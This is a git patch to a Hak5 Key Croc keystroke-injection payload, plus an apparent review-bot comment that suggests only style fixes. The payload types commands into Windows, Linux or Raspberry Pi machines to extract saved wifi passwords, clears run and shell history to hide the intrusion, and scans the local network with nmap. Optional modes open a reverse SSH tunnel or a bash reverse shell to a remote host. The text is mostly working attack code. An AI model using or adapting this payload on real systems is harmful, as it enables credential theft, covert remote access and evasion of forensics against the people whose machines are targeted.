From ec819336d7edb9139ac7cf24e558b70e363ad531 Mon Sep 17 00:00:00 2001
From: spywill
Date: Wed, 19 Jul 2023 06:02:58 -0400
Subject: [PATCH] Update Croc_getonline.txt minor changes new options recon, ssh keycroc MATCH command perform specific tasks
---
 .../Croc_Getonline/Croc_getonline.txt | 412 ++++++++++++++----
 1 file changed, 329 insertions(+), 83 deletions(-)
diff --git a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt
index 64009c0..64f18cf 100644
--- a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt
+++ b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt
@@ -1,118 +1,364 @@ # Title: Croc_Getonline # Description: Attempt to connect Keycroc automatically to target wifi access point -# Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt +# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt # Author: spywill -# Version: 3.5 +# Version: 4.1 # Category: Key Croc # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro -MATCH (getonline_W|getonline_R|getonline_L) +# getonline_W <-- MATCH word for windows, Attempt connection to access point +# getonline_L <-- MATCH word for Linux, Attempt connection to access point +# getonline_R <-- MATCH word for Raspberry pi, Attempt connection to access point +# getonline_N <-- MATCH word for connecting to known SSID ( EDIT PAYLOAD ) +# getonline_F <-- MATCH word for reset wlan0 interface to last known SSID +# getonline_K <-- MATCH word for killing keycroc wlan0 interface +# getonline_S <-- MATCH word for entering ATTACKMODE HID STORAGE +# getonline_H <-- MATCH word for entering ATTACKMODE HID +# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL +# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET +# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot -CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot) -for dir in "${CROC_POT_DIR[@]}"; do [[ ! 
-d "$dir" ]] && mkdir "$dir" || LED B; done +MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X) +QUACK LOCK -wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt +#---> Edit payload option below +option=0 +keycroc_password=hak5croc +wifi_pass=/tools/wifipass.txt -if [ -f $wifi_pass ]; then - cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt - rm -f $wifi_pass +#---> Edit remote host below +remote_user_name=EDIT_REMOTE_USERNAME_HERE +remote_host_ip=EDIT_REMOTE_HOST_IP_HERE +remote_host_password=EDIT_REMOTE_HOST_PASSWORD_HERE +port=7000 + +#---> Edit known SSID and password below +known_ssid=EDIT_KNOWN_SSID_HERE +known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE + +#---> Edit recon scan on/off below +recon=off +recon_loot=/root/udisk/tools/Target_SSID.txt + +#---> Edit Linux target password below +if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then + target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) +else + target_password=ENTER_LINUX_PASSWORD_HERE fi -ATTACKMODE HID STORAGE -Q DELAY 5000 -LED ATTACK +recon_scan() { + if [ "$recon" = "on" ]; then + if [ "$LOOT" = "getonline_W" ]; then + QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\"" + QUACK ENTER + QUACK DELAY 2000 + elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then + QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\"" + QUACK ENTER + QUACK DELAY 2000 + else + : + fi + elif [ "$recon" = "off" ]; then + : + else + : + fi +} + +ENTER_STORAGE() { + if [ -f ~/udisk$wifi_pass ]; then + cat ~/udisk$wifi_pass >> ~/udisk/tools/old_wifipass.txt + rm -f ~/udisk$wifi_pass + fi + ATTACKMODE HID STORAGE + QUACK DELAY 5000 + LED ATTACK +} + +RESET_PAYLOAD() { + QUACK UNLOCK + sleep 5 ; LED OFF + killall -9 bash + killall -9 python + sleep 1 + RELOAD_PAYLOADS +} + +CLEAN_UP() { + if [ "$LOOT" = "getonline_W" ]; 
then + QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "Clear-History ; Remove-Item \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\"" + QUACK ENTER + QUACK DELAY 2000 + elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then + QUACK STRING "history -c ; rm -f ~/.bash_history" + QUACK ENTER + QUACK DELAY 2000 + else + : + fi +} case $LOOT in getonline_W) - Q GUI r - Q DELAY 3000 - Q STRING "powershell -NoP -NonI -W Hidden" - Q ENTER - Q DELAY 5000 - Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" - Q ENTER - Q DELAY 3000 - Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" - Q ENTER - Q DELAY 2000 - Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" - Q ENTER - Q DELAY 2000 - Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\"" - Q ENTER - Q DELAY 5000 - Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit" - Q ENTER + ENTER_STORAGE + QUACK GUI r + QUACK DELAY 3000 + QUACK STRING "powershell -NoP -NonI -W Hidden" + QUACK ENTER + QUACK DELAY 5000 + QUACK STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" + QUACK ENTER + QUACK DELAY 3000 + QUACK STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | 
Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT$wifi_pass\"" + QUACK ENTER + QUACK DELAY 5000 + recon_scan + CLEAN_UP + QUACK STRING "exit" + QUACK ENTER + ATTACKMODE HID ;; getonline_R) - Q CONTROL-ALT-d - Q CONTROL-ALT-t - Q DELAY 2000 - Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" - Q ENTER - Q DELAY 2000 - Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" - Q ENTER - Q DELAY 2000 - Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" - Q ENTER - Q DELAY 2000 - Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" - Q ENTER - Q DELAY 3000 - Q STRING "umount \$MOUNT_POINT ; exit" - Q ENTER + ENTER_STORAGE + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + QUACK STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "SSID_password=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "echo \"\$currentSSID \$SSID_password\" | tee \$MOUNT_POINT$wifi_pass" + QUACK ENTER + QUACK DELAY 3000 + recon_scan + CLEAN_UP + QUACK STRING "umount \$MOUNT_POINT ; exit" + QUACK ENTER + ATTACKMODE HID ;; getonline_L) - if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then - PC_PW=$(sed '$!d' 
/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) + ENTER_STORAGE + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + QUACK STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "$target_password" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "SSID_password=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "echo \"\$currentSSID \$SSID_password\" | sudo tee \$MOUNT_POINT$wifi_pass" + QUACK ENTER + QUACK DELAY 3000 + recon_scan + CLEAN_UP + QUACK STRING "sudo umount \$MOUNT_POINT ; exit" + QUACK ENTER + ATTACKMODE HID +;; + getonline_N) + LED B + sleep 2 + echo "$known_ssid $known_ssid_password" > ~/udisk$wifi_pass +;; + getonline_F) + if [ -f ~/udisk$wifi_pass ]; then + LED B + sleep 2 else - PC_PW=LINUX + LED R + RESET_PAYLOAD fi - Q CONTROL-ALT-d - Q ALT-t - Q DELAY 2000 - Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" - Q ENTER - Q DELAY 2000 - Q STRING "$PC_PW" - Q ENTER - Q DELAY 2000 - Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" - Q ENTER - Q DELAY 2000 - Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" - Q ENTER - Q DELAY 2000 - Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" - Q ENTER - Q DELAY 3000 - Q STRING "sudo umount \$MOUNT_POINT ; exit" - Q ENTER +;; + getonline_K) + ifconfig wlan0 down + LED R + RESET_PAYLOAD +;; + getonline_S) + ATTACKMODE HID STORAGE + RESET_PAYLOAD +;; + getonline_H) + ATTACKMODE HID + RESET_PAYLOAD +;; + getonline_P) + ATTACKMODE HID SERIAL + RESET_PAYLOAD +;; + getonline_A) + ATTACKMODE HID 
AUTO_ETHERNET + RESET_PAYLOAD +;; + getonline_X) + LED R + rm -f /root/udisk/payloads/Croc_getonline.txt + rm -f /root/udisk/tools/wifipass.txt /root/udisk/tools/old_wifipass.txt + rm -f $recon_loot root/udisk/config.txt + apt -y remove sshpass + reboot --force ;; esac - -ATTACKMODE HID sleep 3 -LED SETUP -kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient) +word_count=$(head -n 1 "/root/udisk$wifi_pass" | sed 's/^[[:space:]]*//' | sed 's/[[:space:]]*$//' | wc -w) +if [[ $word_count -eq 2 ]]; then + ssid_to_match="$(sed 's/ .*//' /root/udisk$wifi_pass)" + matched_ssid="$(iw dev wlan0 scan | grep -Ewi "SSID: $ssid_to_match" | sed -e 's/\tSSID: //')" + sleep 1 + if [[ "$ssid_to_match" =~ "$matched_ssid" ]]; then + LED SETUP + else + LED R + RESET_PAYLOAD + fi +else + LED R + RESET_PAYLOAD +fi + +kill -9 $(pidof wpa_supplicant) +kill -9 $(pidof dhclient) ifconfig wlan0 down if [ "$LOOT" = "getonline_W" ]; then - sed -i '0,/./s/^.//' $wifi_pass - sed -i 's/\r//g' $wifi_pass + sed -i '0,/./s/^.//' ~/udisk$wifi_pass + sed -i -e '1s/^[^[:print:]]*//' ~/udisk$wifi_pass + sed -i 's/\r//g' ~/udisk$wifi_pass fi -sed -i 's/\( \)*/\1/g' $wifi_pass -sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt -sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt -wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf +sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass +sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt +sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt +wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf + ifconfig wlan0 up -wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0 +wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf 
+dhclient wlan0 sleep 3 systemctl restart ssh.service -[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R +if : >/dev/tcp/8.8.8.8/53; then + if [ $option -eq 0 ]; then + : + elif [ $option -eq 1 ]; then + case "$LOOT" in + getonline_W) + QUACK GUI m + QUACK GUI r + QUACK DELAY 2000 + QUACK STRING "powershell" + QUACK ENTER + QUACK DELAY 5000 + ;; + getonline_R) + QUACK CONTROL-ALT-d + QUACK CONTROL-ALT-t + QUACK DELAY 2000 + ;; + getonline_L) + QUACK CONTROL-ALT-d + QUACK ALT-t + QUACK DELAY 2000 + ;; + esac + QUACK STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)" + QUACK ENTER + QUACK DELAY 2000 + QUACK STRING "$keycroc_password" + QUACK ENTER + elif [ $option -eq 2 ]; then + status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)" + if [ ! $? = 0 ] || [ ! "$status" = installed ]; then + apt -y install sshpass + else + : + fi + sleep 1 + if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then + cp -rp ~/.ssh ~/udisk/backup_ssh 2>/dev/null + rm -rf ~/.ssh 2>/dev/null + ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa + sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip" + sleep 1 + ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip + else + LED R + sleep 1 + fi + elif [ $option -eq 3 ]; then + if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then + /bin/bash -i >& /dev/tcp/"$remote_host_ip"/"$port" 0>&1 & + else + LED R + sleep 1 + fi + else + LED FINISH + fi + LED FINISH +else + LED R +fi + sleep 3 LED OFF +QUACK UNLOCK + +if [ "$recon" = "on" ]; then + LED C SLOW + echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot + ssid_to_match=$(sed 's/ .*//' ~/udisk$wifi_pass) + iw dev wlan0 scan | egrep -Ewi 'BSS|signal:|SSID:|DS Parameter set:|Country:|freq:|Manufacturer:|Model 
Number:|Serial Number:|Device name:' | grep -A5 -B3 "SSID: $ssid_to_match" >> $recon_loot + echo -ne "\n\nReachable IP on local network:\n\n" >> $recon_loot + ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot + cat /etc/resolv.conf | grep nameserver >> $recon_loot + + echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot + calculate_network_range() { + ip_address=$(ifconfig wlan0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') + netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*') + IFS=. read -r i1 i2 i3 i4 <<< "$ip_address" + IFS=. read -r m1 m2 m3 m4 <<< "$netmask" + network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24" + echo "$network_range" + } + perform_nmap_scan() { + local network_range=$1 + nmap -T4 -F $network_range >> $recon_loot + } + network_range=$(calculate_network_range) + perform_nmap_scan $network_range + + echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot + curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot + echo -ne "\n\n" >> $recon_loot + LED OFF +elif [ "$recon" = "off" ]; then + : +else + : +fi
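Review bot: The new `option=0` knob under `#---> Edit payload option below` is the one setting the header leaves unexplained; every MATCH word gets a one-line comment at the top of the file, but a reader has to trace the `if [ $option -eq 0 ]` … `elif [ $option -eq 3 ]` chain after the `/dev/tcp/8.8.8.8/53` check to learn what the values select. Suggest a comment above it in the same style as the header, `# option <-- 0 = connect only; 1, 2, 3 select the post-connect action in the if/elif chain after the connectivity check`. Separately, `recon_scan` and the final `recon` block each end in `elif [ "$recon" = "off" ]; then :` / `else :` arms that do nothing; a plain `if [ "$recon" = "on" ]; then … fi` reads the same and drops six lines. In that final block, `egrep -Ewi` is deprecated and redundant (`grep -Ewi` is enough), `cat /etc/resolv.conf | grep nameserver` can be `grep nameserver /etc/resolv.conf`, and the `echo -ne` calls would be `printf` under the usual shell lint rules.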